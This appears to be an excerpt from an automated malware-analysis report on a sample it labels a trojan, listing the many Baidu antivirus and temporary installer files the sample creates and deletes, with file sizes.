%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\GameNoDisturb.ini (215 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bd0001.dll (5064 bytes)
%System%\config (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdRepair.exe (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\systemfile.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMLog.dll (32 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe (2105 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\900.dat (8 bytes)
%WinDir%\Prefetch (440 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepMgr.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVLogs.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMTinyXml.dll (6584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDownloadProtect_x64.dll (6584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ad.dll (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMBase.dll (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVEng.dll (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\dnw.xml (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\tips.xml (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSRCore.dll (10136 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Documents and Settings%\%current user%\LOCAL SETTINGS (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDConfig.dll (19152 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMReport.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSkin.dll (37368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\npBaiduSDDetectPlug.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\monitor_config.dat (559 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdTray.exe (46916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\NetService.ini (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico (2105 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\res\InstallWnd.zip (12536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMMsg.dll (33 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSkin.dll (8281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\baidusdRepair.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastImage.png (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTips.rdb (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\uninst.exe (28288 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt64.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDAVCScan.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\Cooly_PluginConfig.xml (720 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSd.exe (13368 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\809.dat (3 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\811.dat (8 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\901.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\804.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度杀毒\百度杀毒.lnk (971 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KavUpdate.dll (9320 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMAVE.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\806.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect_x64.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDShellExt64.dll (14184 bytes)
%System% (488 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\tips.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMDownload.dll (11344 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMNet.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\monitor_config.dat (559 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDUDiskGuard.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKV.rdb (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\dnw.xml (149 bytes)
%WinDir%\Temp\Perflib_Perfdata_1e0.dat (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\PluginInstallHelper.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdUpdate.exe (19152 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMDownload.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMPerfMon.dll (673 bytes)
%WinDir%\Temp\Perflib_Perfdata_c3c.dat (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\TrustAndIso.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMStringUtils.dll (49 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (676 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Cooly_PluginConfig.xml (720 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ToastLogo.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RtpContainerConfig.xml (818 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVConfig.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMRepMgr.dll (10136 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\BDAVCScan.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMUpdate.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMEvents.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDLogicUtils.dll (9320 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDKitUtils.dll (54 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMNet.dll (28288 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayPlugin.rdb (20624 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdSvc.exe (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\cache_config.dat (469 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVCached.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\FileMon.dll (3361 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\System.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdmp.dat (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMPatchAgent.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMPatchAgent.dll (26 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMFrameWork.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\HIPS.dll (7345 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (2916 bytes)
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Perflib_Perfdata_d84.dat (100 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\NetService.ini (615 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\hips.xml (17 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVE.dll (6584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastLogo.ico (2105 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bd0001.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDDownLoadProtectPlugin.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\811.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVVirusPlugins.dll (12024 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepBase.dll (5873 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\tuopan.png (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\806.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\809.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\baidusdRepair.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand64.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bdmp.dat (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\updlog.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\HIPS.dll (30968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDShellExt.dll (15168 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Cookies (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\DriverManager.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMMsg.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\FileMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDCooly.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\CompatibilityChecker.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BSRLib.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\systemfile.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\GameNoDisturb.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\dnw.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ieBaiduSDDetectPlug.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\900.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVMainFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\monitor_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKitUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\kav_verify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\Repair_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDeskBand.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMRepBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\virus_type.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bdvs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\app.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVRmvDevPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\scan_mgr_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDownloadProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\DesktopToast.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSDWrench.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMPerfMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSREng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDDownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdSvc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdRepair.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\PrivacyProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\hips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bduf.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\cache_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\TrustAndIso.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\fm.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\TrayPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMRepMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ad.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bd0001.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVLogs.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDownloadProtect_x64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMStringUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVEng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\tips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMSRCore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVDeskBand64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\iexplore.exe.xml (0 bytes)
%Program Files%\sh0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVTray_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVMainframePluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdTray.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDShellExt64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDAVCScan.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\Cooly_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVTrayTipsPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KavUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDPerflog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDUDiskGuard.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\directui license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\npBaiduSDDetectPlug.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDShellExt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\UserDetectionPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RepairPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVRtp_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ToastLogo.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RtpContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMPatchAgent.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\duilib license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMEvents.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDLogicUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\901.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\804.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMNet.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\806.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVWsc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\810.dat (0 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe (0 bytes)
C:\sh0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\baidusdRepair.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVCached.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVE.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVMainframe_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdUProxy64.exe (0 bytes)
